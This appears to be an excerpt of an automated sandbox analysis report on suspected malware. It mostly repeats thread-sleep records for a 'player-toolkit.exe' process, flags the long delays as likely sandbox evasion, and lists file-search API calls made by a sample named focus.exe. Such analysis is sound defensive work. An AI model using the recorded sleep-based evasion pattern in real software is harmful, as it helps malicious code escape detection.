Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -54116s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -54006s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53897s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53788s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53679s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53569s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53459s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53350s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53241s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53131s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -53022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52912s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52804s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52693s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52584s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52475s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52366s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52257s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52147s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -52038s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51929s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51819s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51710s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51491s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51382s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51272s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51163s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -51054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50944s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50835s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50725s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50616s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50506s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50397s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50288s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50178s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -50069s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49960s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49850s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49740s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49631s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49522s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49413s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49303s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49194s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -49085s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48975s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48866s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48757s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48647s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48538s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48429s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48319s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48208s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -48100s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47991s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47881s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47772s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47663s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47553s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47444s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47335s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47224s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47116s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -47006s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46897s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46788s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46678s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46569s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46460s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46350s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46241s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46132s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -46022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45913s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45804s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45694s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45585s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45474s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45366s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45256s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45147s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -45038s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44928s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44819s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44710s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44491s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44382s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44272s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44163s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -44053s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43943s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43835s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43725s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43616s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43507s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43397s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43288s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43179s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -43069s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42960s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42851s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42741s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42522s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42413s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42303s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42194s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -42085s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41975s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41866s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41757s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41647s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41538s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41279s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41178s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -41069s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -40960s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -40850s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -40741s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -40632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -40248s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -40101s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -39991s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -39854s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -39716s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -39172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -39068s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38958s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38851s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38741s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38632s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38522s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38412s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38303s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38194s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -38084s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37975s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37866s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37756s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37647s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37538s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37428s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37319s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37210s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -37100s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -36991s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -36882s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -36772s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -36663s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248 Thread sleep time: -36554s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59886s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59776s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59666s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59558s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59448s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59339s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59229s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59120s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -59010s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58900s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58792s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58683s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58573s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58464s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58353s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58245s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58136s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -58026s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57917s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57807s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57698s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57588s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57479s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57370s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57261s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57151s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -57042s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56933s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56823s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56713s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56604s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56495s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56386s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56276s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56167s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -56057s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -55948s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -55839s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -55729s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -55620s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -55511s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948 Thread sleep time: -55401s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
